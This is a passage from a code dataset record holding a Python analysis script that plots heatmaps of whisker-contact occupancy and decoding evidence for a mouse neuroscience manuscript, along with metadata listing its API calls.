"usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 306, "usage_type": "name"}, {"api_name": "PIL.Image.fromarray", "line_number": 307, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 307, "usage_type": "name"}, {"api_name": "tkinter.filedialog.asksaveasfilename", "line_number": 315, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 315, "usage_type": "name"}, {"api_name": "cv2.imwrite", "line_number": 319, "usage_type": "call"}]} +{"seq_id": "71343659047", "text": "## Heatmap the contacts and anti-contacts in the warped plot by their evidence\n\n# Uses data:\n# big_weights_part\n# reduced_model_results_sbrc/no_opto/contact_binarized+anti_contact_count+angle+anti_angle_max\n\n\n\"\"\"\n4A, bottom; S4A, bottom\n PLOT_EDGE_SUMMARY_ONLY\n Image of the different shape positions in the consensus space\n\n4B\n PLOT_OCCUPANCY_DISCONLY\n Locations of whisks with contact and whisks without contact\n\n4C; S4B\n PLOT_EVIDENCE_DISCONLY_REWSIDEONLY\n Evidence for stimulus in both whisks with and 
without contact\n\nS4C\n PLOT_EVIDENCE_DISCONLY_CHOICEONLY\n Evidence for choice in both whisks with and without contact\n\"\"\"\n\nimport json\nimport os\nimport pandas\nimport numpy as np\nimport my.plot \nimport matplotlib.pyplot as plt\nimport matplotlib\nimport extras\n\n\n## Plot flags\nmy.plot.manuscript_defaults()\nmy.plot.font_embed()\n\n\n## Parameters\nwith open('../parameters') as fi:\n params = json.load(fi)\n \n \n## Load metadata about sessions\nsession_df, task2mouse, mouse2task = my.dataload.load_session_metadata(params)\nbig_tm = pandas.read_pickle(os.path.join(params['patterns_dir'], 'big_tm'))\n\n# Insert mouse and task levels into big_tm\nbig_tm = my.misc.insert_mouse_and_task_levels(\n big_tm, mouse2task, level=0, sort=True)\n\n# Count the number of trials per session\nn_trials_per_session = big_tm.groupby(['task', 'mouse', 'session']).size()\n\n# Count the number of trials per mouse\nn_trials_per_mouse = n_trials_per_session.sum(level=['task', 'mouse'])\n\n\n## Load warping data\ntransformation_df = pandas.read_pickle(\n os.path.join(params['scaling_dir'], 'transformation_df'))\nconsensus_edge_summary = pandas.read_pickle(\n os.path.join(params['scaling_dir'], 'consensus_edge_summary'))\n\n# ces to plot\ncv_ces = consensus_edge_summary.xs(50, level='stepper_pos').max(level='row')\ncc_ces = consensus_edge_summary.xs(150, level='stepper_pos').max(level='row')\nall_ces = consensus_edge_summary.max(level='row')\n\n# fillna for transparent plotting\ncv_ces[cv_ces == 0] = np.nan\ncc_ces[cc_ces == 0] = np.nan\nall_ces[all_ces == 0] = np.nan\n\n\n## Load data\nC2_whisk_cycles = pandas.read_pickle(\n os.path.join(params['patterns_dir'], 'big_C2_tip_whisk_cycles'))\nbig_cycle_features = pandas.read_pickle(\n os.path.join(params['patterns_dir'], 'big_cycle_features'))\n\n# This is just to plot follicle position\nmean_follicle = pandas.read_pickle(\n os.path.join(params['patterns_dir'], 'mean_follicle'))\n\n# Transform follicle\ntransformed_mean_follicle = my.misc.transform(\n mean_follicle, transformation_df).mean(level='whisker')\n\n\n## Load the original features for plotting\n# Need the original bins ('analysis_bin') to interpret the weights\nouf = pandas.read_pickle(os.path.join(params['logreg_dir'], \n 'obliviated_unaggregated_features_with_bin'))\n\n# Insert mouse and task levels into features\nouf = my.misc.insert_mouse_and_task_levels(\n ouf, mouse2task, level=0, sort=True)\n\n# Add a new bin for this analysis\nbin_edges_frames = np.linspace(-300, 100, 5)\nbin_centers_frames = (bin_edges_frames[1:] + bin_edges_frames[:-1]) / 2.0\nbin_ser = pandas.cut(\n C2_whisk_cycles['peak_frame_wrt_rwin'],\n bin_edges_frames, labels=False, right=True).rename('bin')\n\n# Append bin_ser to index\nidxdf = ouf.index.to_frame().reset_index(drop=True)\nidxdf = idxdf.join(bin_ser, on=['session', 'trial', 'cycle'])\nidxdf['bin'] = idxdf['bin'].fillna(-1).astype(np.int)\nouf.index = pandas.MultiIndex.from_frame(idxdf)\n\n# Drop null bins and reorder levels\nouf = ouf.drop(-1, level='bin')\nouf = ouf.reorder_levels(\n ['task', 'mouse', 'session', 'trial', 'bin', 'analysis_bin', 'cycle']\n ).sort_index()\n\n# Extract features of interest\ncontact_binarized = ouf['contact_binarized']\nanti_contact_count = ouf['anti_contact_count']\n\n\n## Load results of main2a1\nbig_weights_part = pandas.read_pickle('big_weights_part')\n\n# Choose the reduced_model\nreduced_model = 'contact_binarized+anti_contact_count+angle+anti_angle_max'\n\n# Use these weights\nuse_weights = 
big_weights_part[False]['no_opto'][reduced_model]\n\n# normalizing stuff for features that aren't raw\nnormalizing_mu = pandas.read_pickle(os.path.join(\n params['logreg_dir'], 'reduced_model_results_sbrc', 'no_opto', reduced_model, \n 'big_normalizing_mu'))\nnormalizing_sigma = pandas.read_pickle(os.path.join(\n params['logreg_dir'], 'reduced_model_results_sbrc', 'no_opto', reduced_model, \n 'big_normalizing_sigma'))\n\n# Remove redundant\nnormalizing_mu = normalizing_mu.xs(\n 'rewside', level='decode_label').rename('mu').copy()\nnormalizing_sigma = normalizing_sigma.xs(\n 'rewside', level='decode_label').rename('sigma').copy()\n\n\n## Extract the locations of each contact, to be weighted by weights\n# Extract contact presence and angle onto the columns, one row per contact\nstacked_contacts = ouf[\n ['anti_angle_max', 'anti_contact_count', 'contact_binarized', 'angle']\n ].stack('label')\n\n# Drop the rows that have neither anti- nor actual contact\nstacked_contacts = stacked_contacts.loc[\n (stacked_contacts['anti_contact_count'] != 0) |\n (stacked_contacts['contact_binarized'] != 0)\n ].copy()\n\n# Join on whisk location (this is where it will be plotted)\n# TODO: join on contact location, not peak location, but probably the same\nto_join = big_cycle_features[\n ['peak_tip_x', 'peak_tip_y']].stack('whisker')\nto_join.index = to_join.index.rename('label', level='whisker')\nstacked_contacts = stacked_contacts.join(\n to_join, on=['session', 'trial', 'cycle', 'label']).sort_index()\nassert not stacked_contacts.index.duplicated().any()\n\n\n## Apply the standardization to the non-raw features\n# Only standardize these\nstandardized_features = ['anti_angle_max', 'angle']\n\n# Extract and join on sigma and mu\nto_standardize = stacked_contacts[\n standardized_features].stack().rename('value').to_frame()\nto_standardize = to_standardize.join(\n normalizing_mu,\n on=['session', 'metric', 'label', 'analysis_bin']\n )\nto_standardize = to_standardize.join(\n normalizing_sigma,\n on=['session', 'metric', 'label', 'analysis_bin']\n )\nto_standardize['standardized'] = to_standardize['value'].sub(\n to_standardize['mu']).divide(to_standardize['sigma'])\n\n# Drop ones that go to infinity\nto_standardize = to_standardize.loc[\n ~np.isinf(to_standardize['standardized']) &\n ~to_standardize['standardized'].isnull() &\n (to_standardize['standardized'].abs() < 10)\n ]\n\n# Put back into stacked_contacts\n# This will insert nulls where standardized angle was messed up\nto_rejoin = to_standardize['standardized'].unstack('metric')\nstacked_contacts = stacked_contacts.drop(standardized_features, axis=1)\nstacked_contacts = stacked_contacts.join(to_rejoin)\n\n\n## Transform contact location into the warped space\nto_transform = stacked_contacts[['peak_tip_x', 'peak_tip_y']]\ntransformed_contacts = my.misc.transform(\n to_transform, transformation_df).rename(\n columns={'peak_tip_x': 'transformed_x', 'peak_tip_y': 'transformed_y'})\n\n\n## Calculate the evidence of each contact\n# Stack contacts again, so that each metric (e.g. 
angle) is a row\nto_weight = stacked_contacts[\n ['anti_contact_count', 'contact_binarized', 'angle', 'anti_angle_max']\n ].stack().rename('value')\n\n# Get decode_label alone on columns\nflattened_weights = use_weights.stack().stack().stack().unstack('decode_label')\n\n# Rename weights\nflattened_weights = flattened_weights.rename(\n columns={'choice': 'choice_weight', 'rewside': 'rewside_weight'})\n\n# Join the weights onto the contacts\njoined = to_weight.to_frame().join(\n flattened_weights, on=flattened_weights.index.names)\n#~ assert not joined.isnull().any().any()\nassert len(joined) == len(to_weight)\n\n# Shouldn't be any nulls because they would have been dropped by stacking\n#~ assert not joined.isnull().any().any()\n\n# Apply weight\njoined['choice_evidence'] = joined['value'] * joined['choice_weight']\njoined['rewside_evidence'] = joined['value'] * joined['rewside_weight']\nevidence = joined[['choice_evidence', 'rewside_evidence']].copy()\n\n# Sum over metric\nevidence = evidence.sum(\n level=[lev for lev in evidence.index.names if lev != 'metric']\n )\n\n\n## Concat data about contacts, their transformed position, and their evidence\ncontact_evidence = pandas.concat(\n [stacked_contacts, transformed_contacts, evidence], \n axis=1, sort=True, verify_integrity=True).sort_index(axis=1)\n\n\n## Bin the contacts spatially\n# How to bin\nbins_x = np.linspace(-300, 300, 26)\nbincenters_x = (bins_x[1:] + bins_x[:-1]) / 2.0\nbins_y = np.linspace(-200, 400, 26)\nbincenters_y = (bins_y[1:] + bins_y[:-1]) / 2.0\n\n# Histogram the points\ncontact_evidence['bin_x'] = pandas.cut(\n contact_evidence['transformed_x'],\n bins=bins_x,\n labels=False, right=True)\ncontact_evidence['bin_y'] = pandas.cut(\n contact_evidence['transformed_y'],\n bins=bins_y,\n labels=False, right=True)\n\n# Drop ones outside bins\n# TODO: check this doesn't happen too much\ncontact_evidence = contact_evidence.dropna(subset=['bin_x', 'bin_y'])\ncontact_evidence['bin_x'] = contact_evidence['bin_x'].astype(np.int)\ncontact_evidence['bin_y'] = contact_evidence['bin_y'].astype(np.int)\n\n# This is used to reindex various quantities below to evenly tile the frame\nfull_spatial_bincenter_midx = pandas.MultiIndex.from_product([\n pandas.Index(range(len(bincenters_x)), name='bin_x'),\n pandas.Index(range(len(bincenters_y)), name='bin_y'),\n ], names=['bin_x', 'bin_y'])\n\n\n## Rename label to whisker\ncontact_evidence.index = contact_evidence.index.rename('whisker', level='label')\n\n\n## Drop C0 for now\ncontact_evidence = contact_evidence.drop('C0', level='whisker')\n\n\n## Split the evidence by contact vs no-contact whisks\n# A contact occurred\nyes_contact_evidence = contact_evidence.loc[\n (contact_evidence['contact_binarized'] > 0) &\n (contact_evidence['anti_contact_count'] == 0)\n ]\n\n# No contact occurred\nnon_contact_evidence = contact_evidence.loc[\n (contact_evidence['contact_binarized'] == 0) &\n (contact_evidence['anti_contact_count'] > 0)\n ]\n\n# On ~1.5% of whisks some double pump happened where both a contact \n# and an anti-contact happened on the same whisker\n# Those are dropped\n\n# Add this as a level\ncontact_evidence = pandas.concat([\n yes_contact_evidence, non_contact_evidence],\n axis=0, sort=True, verify_integrity=True, keys=['yes', 'non'], \n names=['contact_typ'])\n\n\n## Aggregate the evidence by spatial bins\n# Mean evidence\ngobj = contact_evidence.groupby(\n ['contact_typ', 'task', 'mouse', 'whisker', 'bin_x', 'bin_y'])\naggregated_evidence_spatial = gobj[\n ['choice_evidence', 
'rewside_evidence']].mean()\n\n# Count the number of whisks that went into this mean\nn_whisks = gobj.size().rename('n_whisks')\nassert n_whisks.sum() == len(contact_evidence)\naggregated_evidence_spatial = aggregated_evidence_spatial.join(n_whisks)\n\n# Calculate whisks per trial in each bin\n# This is more appropriate for comparing across conditions\naggregated_evidence_spatial['n_whisks_per_trial'] = (\n aggregated_evidence_spatial['n_whisks'].divide(\n n_trials_per_mouse)).reorder_levels(\n aggregated_evidence_spatial.index.names)\n\n# Also normalize this, so that it sums to 1 over all spatial bins\n# This is more appropriate for just looking at relative spatial distributions\nnormalizing_factor = aggregated_evidence_spatial['n_whisks'].sum(\n level=[lev for lev in aggregated_evidence_spatial.index.names \n if lev not in ['bin_x', 'bin_y']])\naggregated_evidence_spatial['norm_whisks_per_trial'] = (\n aggregated_evidence_spatial['n_whisks'].divide(\n normalizing_factor).reorder_levels(\n aggregated_evidence_spatial.index.names)\n )\n\n\n## Aggregate the evidence by spatiotemporal bins\n## TODO: normalize like above\n# Mean evidence\ngobj = contact_evidence.groupby(\n ['contact_typ', 'task', 'mouse', 'bin', 'whisker', 'bin_x', 'bin_y'])\naggregated_evidence_spatiotemporal = gobj[\n ['choice_evidence', 'rewside_evidence']].mean()\n\n# Sum occupancy\noccupancy = gobj.size().rename('n_contacts')\nassert occupancy.sum() == len(contact_evidence)\naggregated_evidence_spatiotemporal = aggregated_evidence_spatiotemporal.join(occupancy)\n\n# Normalize the occupancy to sum to 1 over the spatial bins\ncontacts_per_bin = aggregated_evidence_spatiotemporal['n_contacts'].sum(\n level=[lev for lev in aggregated_evidence_spatiotemporal.index.names \n if lev not in ['bin_x', 'bin_y']])\naggregated_evidence_spatiotemporal['occupancy'] = aggregated_evidence_spatiotemporal['n_contacts'].divide(\n contacts_per_bin).reorder_levels(aggregated_evidence_spatiotemporal.index.names)\n\n# Replace bin with bincenter\nidxdf = aggregated_evidence_spatiotemporal.index.to_frame().reset_index(drop=True)\nidxdf['frame_bin'] = idxdf['bin'].map(\n pandas.Series(bin_centers_frames, index=range(len(bin_centers_frames))))\naggregated_evidence_spatiotemporal.index = pandas.MultiIndex.from_frame(\n idxdf[['contact_typ', 'task', 'mouse', 'frame_bin', \n 'whisker', 'bin_x', 'bin_y']])\naggregated_evidence_spatiotemporal = aggregated_evidence_spatiotemporal.sort_index()\n\n\n## Plot flags\nPLOT_EDGE_SUMMARY_ONLY = True\nPLOT_OCCUPANCY_DISCONLY = True\nPLOT_EVIDENCE_DISCONLY_REWSIDEONLY = True\nPLOT_EVIDENCE_DISCONLY_CHOICEONLY = True\n\n\n## Plot\nif PLOT_EDGE_SUMMARY_ONLY:\n ## Simple single axis with edge summary, for demonstration\n # Figure handle\n f, ax = plt.subplots(figsize=(3, 2.5))\n f.subplots_adjust(left=0, right=1, bottom=0, top=1)\n \n # Plot edge summary\n extras.plot_warped_edge_summary(\n ax, cv_ces=cv_ces, cc_ces=cc_ces, typ='color_by_stimulus')\n\n # Follicle\n ax.plot(\n [transformed_mean_follicle['x'].values.mean()],\n [transformed_mean_follicle['y'].values.mean()],\n marker='x', color='k', ls='none')\n\n # Pretty\n ax.axis('image')\n ax.set_xlim((-300, 300))\n ax.set_ylim((300, -200))\n ax.set_xticks([])\n ax.set_yticks([]) \n\n # Scale bar\n # 2.7mm = 60px, so 45um per px, or 222.2px per 10mm\n ax.plot([-200, -200+111.1], [275, 275], 'k-', lw=.8)\n ax.text(-200 + 55.55, 275, '5 mm', ha='center', va='bottom', size=12)\n \n # Save\n f.savefig('PLOT_EDGE_SUMMARY_ONLY.svg')\n 
f.savefig('PLOT_EDGE_SUMMARY_ONLY.png', dpi=300)\n\n\nif PLOT_OCCUPANCY_DISCONLY:\n ## Parameters\n # Metric to plot\n metric_topl = 'norm_whisks_per_trial'\n\n # Iterate over whisk type (rows of figure)\n whisk_typ_l = ['yes', 'non']\n \n # Do only discrimination\n task = 'discrimination'\n \n # Binning\n mouse_thresh = 4\n nwpt_thresh = .02\n \n # Plotting\n edge_alpha = .3\n occupancy_vmin = 0\n occupancy_vmax = .03\n \n \n ## Aggregrate\n # Slice by task and group by whisk type\n figure_gobj = aggregated_evidence_spatial.xs(\n task, level='task').groupby(\n 'contact_typ')\n\n \n ## Make handles\n f, axa = plt.subplots(\n len(whisk_typ_l), 1,\n figsize=(3, 6.5), sharex=True, sharey=True)\n \n f.subplots_adjust(left=0, right=1, bottom=0, top=.925, hspace=.3)\n \n \n ## Iterate over whisk types (rows)\n for whisk_typ, sub_ae in figure_gobj:\n \n ## Slice\n # Droplevel\n sub_ae = sub_ae.droplevel('contact_typ')\n\n # Slice data (evidence)\n axis_data = sub_ae[metric_topl]\n\n # Get ax\n ax = axa[\n whisk_typ_l.index(whisk_typ)\n ]\n\n # Set title\n if whisk_typ == 'yes':\n ax.set_title('whisks with contact\\n(location)')\n \n elif whisk_typ == 'non':\n ax.set_title('whisks without contact\\n(location)')\n \n\n ## Spatialize occupancy\n # Mean over mice, separately by whisker\n spatialized = axis_data.mean(\n level=['whisker', 'bin_x', 'bin_y'])\n \n\n # Combine to rgb\n occupancy_rgb = extras.combine_whisker_occupancy_to_rgb(\n spatialized, full_spatial_bincenter_midx, \n bins_x, bins_y,\n x_index=all_ces.columns, y_index=all_ces.index,\n vmin=occupancy_vmin, vmax=occupancy_vmax)\n \n\n ## Calculate edge_data\n edge_data = all_ces.values\n\n # Mask the edge_data, so that it has no effect where it is null\n # Actually, this just avoids warnings about null in normalizing\n masked_edge_data = np.ma.masked_array(\n edge_data, np.isnan(edge_data))\n\n # Normalize edge data to (0, 1) and colormap in black and white\n # This replaces masked data with the colormap's \"bad value\"\n edge_norm = matplotlib.colors.Normalize(vmin=0, vmax=1)\n edge_data_rgba = plt.cm.gray_r(edge_norm(masked_edge_data))\n\n \n ## Blend occupancy_data and edge_data\n blended_rgba = my.plot.alpha_blend_with_mask(\n edge_data_rgba, \n occupancy_rgb, \n edge_alpha,\n masked_edge_data.mask,\n )\n\n \n ## Plot\n im = my.plot.imshow(\n blended_rgba, ax=ax, \n x=all_ces.columns.values, y=all_ces.index.values)\n \n\n ## Pretty\n # Plot follicle and ellipses\n extras.plot_follicle_and_ellipses(\n ax, transformed_mean_follicle, label_ellipses=True)\n \n # Limits\n extras.consistent_limits(ax)\n\n\n f.savefig('PLOT_OCCUPANCY_DISCONLY.svg')\n f.savefig('PLOT_OCCUPANCY_DISCONLY.png', dpi=300) \n\n\nif PLOT_EVIDENCE_DISCONLY_REWSIDEONLY:\n ## Parameters\n # Metric to plot\n metric_topl = 'rewside_evidence'\n\n # Iterate over whisk type (rows of figure)\n whisk_typ_l = ['yes', 'non']\n \n # Do only discrimination\n task = 'discrimination'\n \n # Binning\n mouse_thresh = 4\n nwpt_thresh = .02\n \n # Plotting\n edge_alpha = .3\n evidence_vmin = -1\n evidence_vmax = 1\n \n \n ## Aggregrate\n # Slice by task and group by whisk type\n figure_gobj = aggregated_evidence_spatial.xs(\n task, level='task').groupby(\n 'contact_typ')\n \n \n ## Make handles\n f, axa = plt.subplots(\n len(whisk_typ_l), 1,\n figsize=(4.25, 6.5), sharex=True, sharey=True)\n \n f.subplots_adjust(left=0, right=.7, bottom=0, top=.925, hspace=.3)\n\n # Axis for colorbar\n cb_ax = f.add_axes((.77, .27, .03, .4))\n cb = f.colorbar(\n matplotlib.cm.ScalarMappable(\n 
matplotlib.colors.Normalize(vmin=evidence_vmin, vmax=evidence_vmax),\n cmap=plt.cm.RdBu_r), cax=cb_ax)\n cb.set_ticks((evidence_vmin, 0, evidence_vmax))\n cb.ax.tick_params(labelsize=12)\n \n \n ## Iterate over whisk types (rows)\n for whisk_typ, sub_ae in figure_gobj:\n \n ## Slice\n # Droplevel\n sub_ae = sub_ae.droplevel('contact_typ')\n\n # Slice data (evidence)\n axis_data = sub_ae[metric_topl]\n\n # Get ax\n ax = axa[\n whisk_typ_l.index(whisk_typ)\n ]\n\n # Set title\n if whisk_typ == 'yes':\n ax.set_title('whisks with contact\\n(evidence)')\n \n elif whisk_typ == 'non':\n ax.set_title('whisks without contact\\n(evidence)')\n \n\n ## Identify spatial bins with enough whisks to be worth plotting\n keep_mask = extras.threshold_bins_by_n_whisks(\n sub_ae, mouse_thresh=mouse_thresh, nwpt_thresh=nwpt_thresh)\n \n \n ## Spatialize evidence\n evidence_data = extras.spatialize_evidence(\n axis_data, keep_mask, full_spatial_bincenter_midx,\n bins_x, bins_y,\n x_index=all_ces.columns, y_index=all_ces.index,\n )\n\n # Use only raw data\n evidence_data = evidence_data.values\n\n\n ## Calculate edge_data\n edge_data = all_ces.values\n\n # Mask the edge_data, so that it has no effect where it is null\n # Actually, this just avoids warnings about null in normalizing\n masked_edge_data = np.ma.masked_array(\n edge_data, np.isnan(edge_data))\n\n\n ## Normalize and blend plot\n extras.normalize_and_blend_plot(\n masked_edge_data, evidence_data, edge_alpha=edge_alpha, ax=ax,\n evidence_vmin=evidence_vmin, evidence_vmax=evidence_vmax,\n x_index=all_ces.columns.values, y_index=all_ces.index.values,\n )\n\n\n ## Pretty\n # Plot follicle and ellipses\n extras.plot_follicle_and_ellipses(ax, transformed_mean_follicle)\n \n # Limits\n extras.consistent_limits(ax)\n\n \n ## Save\n f.savefig('PLOT_EVIDENCE_DISCONLY_REWSIDEONLY.svg')\n f.savefig('PLOT_EVIDENCE_DISCONLY_REWSIDEONLY.png', dpi=300) \n\n\nif PLOT_EVIDENCE_DISCONLY_CHOICEONLY:\n ## Parameters\n # Metric to plot\n metric_topl = 'choice_evidence'\n\n # Iterate over whisk type (rows of figure)\n whisk_typ_l = ['yes', 'non']\n \n # Do only discrimination\n task = 'discrimination'\n \n # Binning\n mouse_thresh = 4\n nwpt_thresh = .02\n \n # Plotting\n edge_alpha = .3\n evidence_vmin = -.5\n evidence_vmax = .5\n \n \n ## Aggregrate\n # Slice by task and group by whisk type\n figure_gobj = aggregated_evidence_spatial.xs(\n task, level='task').groupby(\n 'contact_typ')\n \n \n ## Make handles\n f, axa = plt.subplots(\n len(whisk_typ_l), 1,\n figsize=(4.25, 6.5), sharex=True, sharey=True)\n \n f.subplots_adjust(left=0, right=.7, bottom=0, top=.925, hspace=.3)\n \n # Axis for colorbar\n cb_ax = f.add_axes((.77, .27, .03, .4))\n cb = f.colorbar(\n matplotlib.cm.ScalarMappable(\n matplotlib.colors.Normalize(vmin=evidence_vmin, vmax=evidence_vmax),\n cmap=plt.cm.RdBu_r), cax=cb_ax)\n cb.set_ticks((evidence_vmin, 0, evidence_vmax))\n cb.ax.tick_params(labelsize=12)\n \n \n ## Iterate over whisk types (rows)\n for whisk_typ, sub_ae in figure_gobj:\n \n ## Slice\n # Droplevel\n sub_ae = sub_ae.droplevel('contact_typ')\n\n # Slice data (evidence)\n axis_data = sub_ae[metric_topl]\n\n # Get ax\n ax = axa[\n whisk_typ_l.index(whisk_typ)\n ]\n \n # Set title\n if whisk_typ == 'yes':\n ax.set_title('whisks with contact\\n(evidence)')\n \n elif whisk_typ == 'non':\n ax.set_title('whisks without contact\\n(evidence)')\n\n\n ## Identify spatial bins with enough whisks to be worth plotting\n keep_mask = extras.threshold_bins_by_n_whisks(\n sub_ae, mouse_thresh=mouse_thresh, 
nwpt_thresh=nwpt_thresh)\n \n \n ## Spatialize evidence\n evidence_data = extras.spatialize_evidence(\n axis_data, keep_mask, full_spatial_bincenter_midx,\n bins_x, bins_y,\n x_index=all_ces.columns, y_index=all_ces.index,\n )\n\n # Use only raw data\n evidence_data = evidence_data.values\n\n\n ## Calculate edge_data\n edge_data = all_ces.values\n\n # Mask the edge_data, so that it has no effect where it is null\n # Actually, this just avoids warnings about null in normalizing\n masked_edge_data = np.ma.masked_array(\n edge_data, np.isnan(edge_data))\n\n\n ## Normalize and blend plot\n extras.normalize_and_blend_plot(\n masked_edge_data, evidence_data, edge_alpha=edge_alpha, ax=ax,\n evidence_vmin=evidence_vmin, evidence_vmax=evidence_vmax,\n x_index=all_ces.columns.values, y_index=all_ces.index.values,\n )\n\n\n ## Pretty\n # Plot follicle and ellipses\n extras.plot_follicle_and_ellipses(ax, transformed_mean_follicle)\n \n # Limits\n extras.consistent_limits(ax)\n\n \n \n \n ## Save\n f.savefig('PLOT_EVIDENCE_DISCONLY_CHOICEONLY.svg')\n f.savefig('PLOT_EVIDENCE_DISCONLY_CHOICEONLY.png', dpi=300) \n\n \nplt.show()", "repo_name": "cxrodgers/Rodgers2021", "sub_path": "04_logreg_vis/main3b.py", "file_name": "main3b.py", "file_ext": "py", "file_size_in_byte": 23786, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "my.plot.plot.manuscript_defaults", "line_number": 37, "usage_type": "call"}, {"api_name": "my.plot.plot", "line_number": 37, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 37, "usage_type": "name"}, {"api_name": "my.plot.plot.font_embed", "line_number": 38, "usage_type": "call"}, {"api_name": "my.plot.plot", "line_number": 38, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 38, "usage_type": "name"}, {"api_name": "json.load", "line_number": 43, "usage_type": "call"}, {"api_name": "my.plot.dataload.load_session_metadata", "line_number": 47, "usage_type": "call"}, {"api_name": "my.plot.dataload", "line_number": 47, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 47, "usage_type": "name"}, {"api_name": "pandas.read_pickle", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "my.plot.misc.insert_mouse_and_task_levels", "line_number": 51, "usage_type": "call"}, {"api_name": "my.plot.misc", "line_number": 51, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 51, "usage_type": "name"}, {"api_name": "pandas.read_pickle", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pandas.read_pickle", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 73, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 74, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 75, "usage_type": "attribute"}, {"api_name": "pandas.read_pickle", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "pandas.read_pickle", 
"line_number": 81, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "pandas.read_pickle", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "my.plot.misc.transform", "line_number": 89, "usage_type": "call"}, {"api_name": "my.plot.misc", "line_number": 89, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 89, "usage_type": "name"}, {"api_name": "pandas.read_pickle", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path", "line_number": 95, "usage_type": "attribute"}, {"api_name": "my.plot.misc.insert_mouse_and_task_levels", "line_number": 99, "usage_type": "call"}, {"api_name": "my.plot.misc", "line_number": 99, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 99, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 103, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 112, "usage_type": "attribute"}, {"api_name": "pandas.MultiIndex.from_frame", "line_number": 113, "usage_type": "call"}, {"api_name": "pandas.MultiIndex", "line_number": 113, "usage_type": "attribute"}, {"api_name": "pandas.read_pickle", "line_number": 127, "usage_type": "call"}, {"api_name": "pandas.read_pickle", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path", "line_number": 136, "usage_type": "attribute"}, {"api_name": "pandas.read_pickle", "line_number": 139, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 139, "usage_type": "call"}, {"api_name": "os.path", "line_number": 139, "usage_type": "attribute"}, {"api_name": "numpy.isinf", "line_number": 192, "usage_type": "call"}, {"api_name": "my.plot.misc.transform", "line_number": 206, "usage_type": "call"}, {"api_name": "my.plot.misc", "line_number": 206, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 206, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 254, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 258, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 270, "usage_type": "attribute"}, {"api_name": "numpy.int", "line_number": 271, "usage_type": "attribute"}, {"api_name": "pandas.MultiIndex.from_product", "line_number": 274, "usage_type": "call"}, {"api_name": "pandas.MultiIndex", "line_number": 274, "usage_type": "attribute"}, {"api_name": "pandas.Index", "line_number": 275, "usage_type": "call"}, {"api_name": "pandas.Index", "line_number": 276, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 306, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 366, "usage_type": "call"}, {"api_name": "pandas.MultiIndex.from_frame", "line_number": 367, "usage_type": "call"}, {"api_name": "pandas.MultiIndex", "line_number": 367, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 384, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", 
"line_number": 384, "usage_type": "name"}, {"api_name": "extras.plot_warped_edge_summary", "line_number": 388, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 443, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 443, "usage_type": "name"}, {"api_name": "extras.combine_whisker_occupancy_to_rgb", "line_number": 480, "usage_type": "call"}, {"api_name": "numpy.ma.masked_array", "line_number": 492, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 492, "usage_type": "attribute"}, {"api_name": "numpy.isnan", "line_number": 493, "usage_type": "call"}, {"api_name": "matplotlib.colors.Normalize", "line_number": 497, "usage_type": "call"}, {"api_name": "matplotlib.colors", "line_number": 497, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.cm.gray_r", "line_number": 498, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 498, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 498, "usage_type": "name"}, {"api_name": "my.plot.plot.alpha_blend_with_mask", "line_number": 502, "usage_type": "call"}, {"api_name": "my.plot.plot", "line_number": 502, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 502, "usage_type": "name"}, {"api_name": "my.plot.plot.imshow", "line_number": 511, "usage_type": "call"}, {"api_name": "my.plot.plot", "line_number": 